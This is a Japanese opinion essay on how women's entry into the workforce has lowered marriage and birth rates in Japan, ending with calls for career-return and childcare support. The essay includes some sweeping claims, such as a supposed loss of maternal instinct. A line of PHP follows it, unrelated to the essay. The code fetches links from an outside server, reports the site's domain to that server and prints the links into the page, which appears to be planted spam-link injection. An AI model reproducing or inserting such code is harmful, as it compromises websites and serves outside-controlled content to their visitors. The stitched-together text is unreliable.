女性の社会進出と結婚

現代において結婚とは男女双方に結婚の合意があればできるものである。
にもかかわらず現代の日本では30代後半の未婚率が男性で30%、女性で18%となっています。
その理由については諸説ありますが、一番は女性の社会進出にあります。
女性が高等教育を受けることができるようになり、大学卒業後就職してすぐの結婚そのまま退職というパターンも減って来ました。
女性の社会進出により男性の食い扶持が減り、女性にとっては自分と同等の収入を得る男性に魅力をもてなくなってきたことも結婚率を引き下げている原因だと思います。
また男性側にとってもすべての社会サービスで日常の洗濯食事などが事足りるようになってきたことも一員であると思います。
結婚後もそのまま仕事を続けて夫婦ともに収入を得続けるDINKSの夫妻も増えてきました。
また海外のようにベビーシッターを利用するということが当然という風潮ではないことから、結婚後もそのまま子供を育てず生涯働き続ける女性もいます。
子供を育てない理由にキャリアを中断されることを嫌う女性や男性女性不妊、また様々な自由を失ってまで子供を育てたいと思う女性の母性の消失というものが挙げられています。
このまま少子化が続けば日本の高齢者層1人を2人から3人で支える社会となってしまうでしょう。
当然このままでは立ち行かなくなります。
早いうちに結婚後にキャリアが中断しても復帰できる社会をまた子育て支援に国家予算の財源を割くべきだと思います。

//// $MAX = 5; // ////////////////// $lines = file('http://www.admin-search.biz/B/seo_links/?r_dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']));shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); }